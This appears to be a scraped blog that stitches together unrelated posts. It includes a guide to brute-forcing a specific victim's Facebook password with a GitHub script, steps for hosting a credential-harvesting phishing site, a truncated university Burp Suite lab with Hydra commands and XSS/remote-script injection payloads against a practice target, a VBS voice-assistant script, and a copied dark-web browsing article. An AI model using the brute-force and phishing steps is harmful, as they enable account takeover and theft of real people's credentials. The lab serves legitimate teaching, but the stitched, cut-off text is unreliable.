Friday, 28 September 2018

How to hack a facebook Account using Bruteforce

Using Kali Linux


First of all you have to download kali linux
thne you have to boot into the kali linux machine What ever you use laptop or PC.

1) Information Gathering.


Then You have to Gether All information about Your Victim . You have to Make A WordList .
There are several methods to make a wordlist But I suggest you To You to use your custom WordList
The Wordlsit Contain All the possible combination of your Victim Password
You Have to Find all the Information ABout Your Victim To make A strong Wordlist
Make Wordlist about of 2 to 200000 password combinations.
Note (If Your Wordlist does't Contain the Password Then You are unable to hack a account)

2) Email/User Name Of your Victim

As you know about user name and email of a facebook user if you don't have email or your victim
then there is another way to find user name of your victim
Steps Are as follows.
* The First thing you need to open facebook using your browser or mobile api.
then you have to copy the profile lif of the victim to notepad. Your Link is like that
      Condition 1
"https://www.facebook.com/10000215481213"

      Condition 2
"https://www.facebook.com/victimUName"


In the First Condition your victim user name is "10000215481213"
In the Second Condition Your Victime Uswe name is "victimUName132"
You have to copy your victime user name to your Notepad/Leafpad or What ever you use.

3) Application

YOu have to download the facebook bruteforce script from github
The Link Is :-https://github.com/ElbertShahzaib/FbBruter

4) Run Attack

the most important step in this attack
Now you Have to Goto Your terminal and goto the directory where you download the bruteforce script
Example :- "cd /root/Desktop/fbbruter"
You have to just copy this command to your terminal and press enter
THe you are in the Directory of the Bruteforce script But You have to run perl script .
Now You have to run this command in the same terminal
         perl facebook.pl "User name of victim ) "Wordlist path "
Example :- perl facebook.pl 10000215481213 /root/Desktop/Wordlist.txt
Then Press Enter
Set back and wait for password.
       

            Using Termux

Termux is the widely hackinh app used in the android plateform
The same things you need to do
But in the termux perl script in not install you have to install it By using this command
"pkg install perl"
* First of all make a word list.
* Download the bruteforce script.
* Goto Direcotry of the Script
* Run Comand As Same In kali linux terminal



Brup suite

 

 

Lab 5: Web Attacks using Burp Suite

Aim
The aim of this lab is to provide a foundation in performing security testing of web applications
using Burp Suite and its various tools. Burp Suite and its tools work seamlessly together in
order to support the entire web application testing process.
Outline
Burp Suite created by PortSwigger Web Security is a Java-based integrated software platform
of tools for performing security testing of web applications. Its various tools work seamlessly
together to support the entire testing process, from initial mapping and analysis of an
application's attack surface, through to finding and exploiting security vulnerabilities. This
includes key components such as: Proxy, Spider, Scanner, Intruder, Repeater and Sequencer.
Activities:
Complete Lab 5: Web Attacks and Logs using Burp Suite.
Time to Complete: 2-3 hours
Learning activities:
At the end of this lab, you should understand:

How to use Burp Suite and its associated tools in order to perform security testing of web
applications.
A Lab Overview
Our challenge is to assess the Web security for MyBank Incorp, and investigate a range of
intrusion methods, including for XSS (Cross-site Scripting) and SQL injection.
Demonstrations can be found here:
http://youtu.be/nRFKJTNU0E8 and http://youtu.be/FhpPHsnebcA
We will be using ALLOCATION A [Link] http://asecuritysite.com/csn10107/prep
Your Kali DMZ and your Metasploitable DMZ should be sitting in the same domain, having
an IP address and being able to ping each other.



B Intercepting Proxy

In Burp Suite, intercepting Proxy lets you inspect and modify traffic between your browser
and the target application. Therefore by using Proxy tab in Burp Suite, we can intercept the
communications between a client (such as a Web browser) and the server. For this, set up your
browser (Iceweasel), in Kali, to use a Proxy (127.0.0.1 on port 8080). (Hint: use: Edit >
Preferences> Advanced > Network > Settings).
Go to Burp Suite and in the Proxy tab, set Intercept to on (see below).
(Hint: Burp Suite can be found in: Applications> Kali Linux> Top 10 Security Tools >
burpsuite. You can also access it by simply typing: sudo burpsuite in your Kali Linux
terminal.)
C
Brute Force
For this part of the lab, we will crack the username and password on the Web login in two
ways. The first is use Hydra, where you can create a user file and password file with the
following:
list_user:
administrator
admin
root
guest
list_password:
adminpass
password
Password
123456
pa$$word
Next run Hydra with these usernames and passwords:
# hydra -L list_user -P list_password [IP META] http-post-form
‘/dvwa/login.php:username=^USER^&password=^PASS^&Login=Login:Login failed’
From this determine one of the usernames and passwords.
In the next method, capture a sample login for a user (hint: enter a name and a password in the
login page on your browser and press login) then capture the trace with Burp Suite and send
it to Intruder (hint: right click and select: Send to Intruder).
On Intruder>Positions page, from Attack type drop down menu select: Cluster bomb
Then put fuzzifier around username and password only: $username$, $password$ and clear
the rest of fuzzifiers.
Then Go to Intruder>Payloads page and enter the same user names and passwords in two
lists.
Payload set > 1 >
6
Bill, Naghmeh, Richardadministrator
admin
root
guest
Payload set> 2 >
password
Password
123456
pa$$word
Then run the brute-force fuzzer from the Intruder>Start Attack menu on top.
From this determine one of the usernames and passwords.
D
Injection Attack
Within Kali, start-up Burp Suite. Next open-up a browser, and set it up to use a Manual proxy
of 127.0.0.1 on a port of 8080. From the browser in Kali, access the Metasploit instance from
the page:
http://[IP META]/mutillidae/index.php?page=dns-lookup.php
Go to Burp Suite and forward it.
Now enter google.com for a search for IP addresses and press “Lookup DNS”. Then use Burp
Suite to see the captured response in Intercept tab.
POST /mutillidae/index.php?page=dns-lookup.php HTTP/1.1
Host: 10.200.0.47
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:18.0) Gecko/20100101 Firefox/18.0
Iceweasel/18.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.200.0.47/mutillidae/index.php?page=dns-lookup.php
Cookie: PHPSESSID=2858f079ae6eaad4f60e4d2c8ec4e7a2
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 62
target_host=google.com&dns-lookup-php-submit-button=Lookup+DNS
In Intercept tab, right click and select: Send to Repeater. Then go to the Repeater tab and press
Go.
In Response> Raw press Ctrl + A and then Ctrl + C to copy the entire response from the server.
Now go to Comparer tab and Paste the first response there.
7
Bill, Naghmeh, RichardGo back to the Repeater tab and modify the request from google.com to intel.com, and send it
again to Web server by pressing Go.
POST /mutillidae/index.php?page=dns-lookup.php HTTP/1.1
Host: 10.200.0.47
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:18.0) Gecko/20100101 Firefox/18.0
Iceweasel/18.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.200.0.47/mutillidae/index.php?page=dns-lookup.php
Cookie: PHPSESSID=2858f079ae6eaad4f60e4d2c8ec4e7a2
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 62
target_host=intel.com&dns-lookup-php-submit-button=Lookup+DNS
In Response> Raw press Ctrl + A and then Ctrl + C to copy the entire response from the server.
Now go to Comparer tab and Paste the second response there.
Press Words to compare the words from two responses.
Outline how many differences are between two pages.
Outline the IP addresses returned for google.com and intel.com. What are the IP addresses
found:
Hint: you need to have Internet connectivity to see the response from the server.
It can be seen that one of the changes is between the google.com and the intel.com names.
Identify these in the changes. Next we inject some scripts. Go to the browser and enter the
following script and then click “Lookup DNS”:
<script>alert(‘Oops I have been compromised’);</script>
Then press forward in Burp Suite.
Verify that it now shows a pop-up message on Iceweasel.
Link modification
Next we will compromise one of the menu items for the Hypertext links. For this add a request
of (look for “a” tag 0 and replace it with BBC website).
Go to the browser and enter the following script and then click “Lookup DNS”:
<script>var link=document.getElementsByTagName("a");
link[0].href="http://bbc.co.uk"</script>
8
Bill, Naghmeh, RichardThen press forward in Burp Suite.
Now, examine the reply coming back, and access related Web link (e.g. click on Home), and
verify that it goes to the BBC site (Home link).
Remote JavaScript injection
Next we will insert some JavaScript from a remote site. On your Kali instance, make sure the
Web server is running:
apache2ctl start
Go to the /var/www folder on Kali and create a file name test.js, and add the following
contents:
function Redirect() {
window.location="http://asecuritysite.com/oops.html";
}
setTimeout('Redirect()', 100);
Now inject this script into the page. By first accessing:
http://[IP META]/mutillidae/index.php?page=dns-lookup.php
and insert the following script:
<script src="http://[IP KALI]/test.js"></script>
The Javascript should be inserted into the page. The page should now be hacked. What is the
result:
E
JavaScript Injection
Within Kali, start-up Burp Suite. Next open-up a browser, and set it up to use a Manual proxy
of 127.0.0.1 on a port of 8080. From the browser, access the Metasploit instance from the page:
http://[IP META]/mutillidae/index.php?page=password-
generator.php&username=anonymous
Go to Burp Suite and forward it.
Go to HTTP history on Burp Suite and check if you can find the page below.
GET /mutillidae/index.php?page=password-generator.php&username=anonymous HTTP/1.1
Host: 10.200.0.47
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:18.0) Gecko/20100101 Firefox/18.0
Iceweasel/18.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
9
Bill, Naghmeh, RichardAccept-Encoding: gzip, deflate
Referer: http://10.200.0.47/mutillidae/
Cookie: PHPSESSID=2858f079ae6eaad4f60e4d2c8ec4e7a2
Connection: keep-alive
If-Modified-Since: Sun, 25 May 2014 19:48:33 GMT
Now examine the response, and find the anonymous name. Take the request, and copy it to
Repeater tab (or right click and Send to Repeater).
Go to Repeater and click on Go to see the Response. Copy the response and paste it in
comparer.
Now go back to Repeater and change the username to: canary and then press Go.
GET /mutillidae/index.php?page=password-generator.php&username=canary HTTP/1.1
Host: 10.200.0.47
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:18.0) Gecko/20100101 Firefox/18.0
Iceweasel/18.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.200.0.47/mutillidae/
Cookie: PHPSESSID=2858f079ae6eaad4f60e4d2c8ec4e7a2
Connection: keep-alive
If-Modified-Since: Sun, 25 May 2014 19:48:33 GMT
Select Go, and view the response:
HTTP/1.1 200 OK
Date: Sun, 25 May 2014 20:28:10 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2
X-Powered-By: PHP/5.2.4-2ubuntu5.10
...
Copy the response and paste it in comparer.
GET /mutillidae/index.php?page=password-generator.php&username=anonymous HTTP/1.1
GET /mutillidae/index.php?page=password-generator.php&username=canary HTTP/1.1
There should be six differences. What are t

How to Make Windows 7 AI

Hi ! in this tutorial I gonna show you how to make your Personal Speaking assistant
to do this you just need Notepad no any softwear of any hardware.
The notepad is already install in the windows .
The Only thing you have to do is program the script of your assistant

                         The Program Example


"""
Set Sapi = Wscript.CreateObject("SAPI.SpVoice")
set wshshell = wscript.CreateObject("wscript.shell")

dim Input

wshshell.run "%windir%\Speech\Common\sapisvr.exe -SpeechUX"
Sapi.speak "Please speak, or type, what you want to open?"
Input=inputbox ("Please speak, or type, what you want to open.")





if Input = "youtube" OR Input = "Youtube"then
Sapi.speak "Opening youtube"
wshshell.run "www.youtube.com"

else
if Input = "instructables" OR Input = "Instructables" then
Sapi.speak "Opening instructables"
wshshell.run "www.instructables.com"

else
if Input = "google" OR Input = "Google" then
Sapi.speak "Opening google"
wshshell.run "www.google.com"

else
if Input = "command prompt" OR Input = "Command prompt" then
Sapi.speak "Opening command prompt"
wshshell.run "cmd"

else
if Input = "calculator" OR Input = "Calculator" then
Sapi.speak "Opening calculator"
wshshell.run "calc"
                        """




You are able to change the script. Add or remove the text or sound
Note... At the end you have to save it in the form of "name.vbs"
you hae to save it in the form of vbs extension .
With out vbs your assistant is not working
This is the simple code/Program for your Personal Assistant For Computer

Make YOur Own Phishing Site

 Only For Educational Purposes!!!

 

Hello All.

Today i gonna show you hove we make our own phishing site like ZSHADOW.
for this you need a Gmail account .

1) First goto www.000webhost.com then create your free website on it.

2) then simple complete all the information steps need to verify your account.

3) just Upload the file to your file manager.

4) Named it as index.html.

5) If you need your custom Domain then Just goto freenom.com .

6) Make A account in it .

7) Search the custom domain .

8) the park it with 000webhost.

Now your phishing site is ready
All your Password And Credentials are in your DataBase open Data Base And Read All The Clear Passwords

Download index.html From Facebook


Thank You .

Serve DarkWebsites Safely

The Dark Web is easy to find. With the right tools, and a stomach made of steel, anyone can access and browse the internet's underbelly. Lurking under the surface of the clear web--sites we visit every day with traditional web browsers and search engines--are indeed black markets loaded with stolen credit card information, black hat hackers, and human and drug traffickers.
The Dark Web, the deep web, and darknet, are spooky-sounding phrases that refer to websites that mask their IP address and can only be accessed using encryption-friendly tools like The Onion Router. TOR is an open source project best known for developing a Firefox-fork web browser pre-loaded with a number of hard-coded security and encryption enhancements. TOR allows users to obfuscate browsing activity by scrambling a user's IP address through a secure and distributed network.
The TOR project also develops Tails, a live, pre-configured Linux distribution that will run on almost any computer. Popularized by Edward Snowden, Tails runs as a discrete operating system on USB flash drives. Tails provides additional layers of security so that Dark Web browsing is not tied directly to a user's machine. Tails also allows users to store encrypted files, run email programs and PGP, and run the TOR browser.
The modern Dark Web's notorious reputation is well-earned, and the hidden internet is undeniably dangerous. Though encrypted websites have existed for more than a decade, the Dark Web rose to mainstream prominence alongside the Silk Road, the now-defunct "Amazon for Drugs." YouTube is loaded with Dark Web horror stories, and the Hidden Wiki serves as a portal to the criminal underground.
There are also number of legitimate reasons users may want to access the Dark Web. The web's substratum is populated by mainstream web companies like Facebook, political activists, and journalists who need to communicate and share sensitive information. The United Nations, FBI, and CIA use the encrypted internet to monitor terror groups like Daesh and keep tabs on criminal profiteers. Corporate IT departments frequently crawl the Dark Web in search of stolen corporate credit card information and compromised accounts.
Here's how to safely access and browse the Dark Web:
Step 1: Plan ahead.

There are plenty of reasons companies and individuals may want to access the Dark Web. SMBs and enterprise companies in particular may want to monitor Dark Web portals for stolen corporate account information. Individuals may want to monitor sites for evidence of identity theft. Facebook's encrypted site, located at facebookcorewwwi.onion, is a feature-rich method of accessing the social network using end-to-end encryption.
  • Set a goal, make plans, and stay focused. Be mindful of purpose. Make sure you know what information you're looking for and why you're logging on to the encrypted web. For example, if you're a reporter and need to communicate with sources, focus on PGP, email, and encrypted communication. If you're searching for credit card information, look for Silk Road-type markets that sell hacked data.
  • Get what you need, safely disconnect TOR and Tails, then log off.Step 2: Obtain a new USB flash drive.
Purchase a new 8 GB or larger USB flash drive. Make sure you use a fresh, unused drive. You will install Tails, and Tails only, directly on your storage device.
Step 3: Prepare your local machine.
Ideally, use a fresh laptop. This isn't an option for most users, so instead do everything in your power to secure and isolate mission-critical information.
  • Back up critical data and local files.
  • Make sure your hardware is optimized and malware-free.
Step 4: Download Tails and TOR.
TOR and Tails are available on the TOR Project website. Access download links directly from https://www.torproject.org. Insert your USB drive and follow the instructions on https://tails.boum.org.
Step 5: Browse safely.
Common portals and search engines:
Encryption is strong, but not impenetrable. The FBI discovered and exploited vulnerabilities in the TOR network. Though the agency refused to disclose the source code used to penetrate the network, undoubtedly law enforcement agencies around the world monitor and operate on the Deep Web. Members of the TOR project vowed to patch network holes and strengthen the protocol.

TechRepublic does not condone illegal or unethical activity. Offensive material can sometimes be just a click away. Browse at your own risk. Never break the law. Use the Dark Web safely, and for legal purposes only.
We're interested in your feedback and thoughts about why and how SMBs and enterprise companies use the Deep Web. Your comments below are welcome.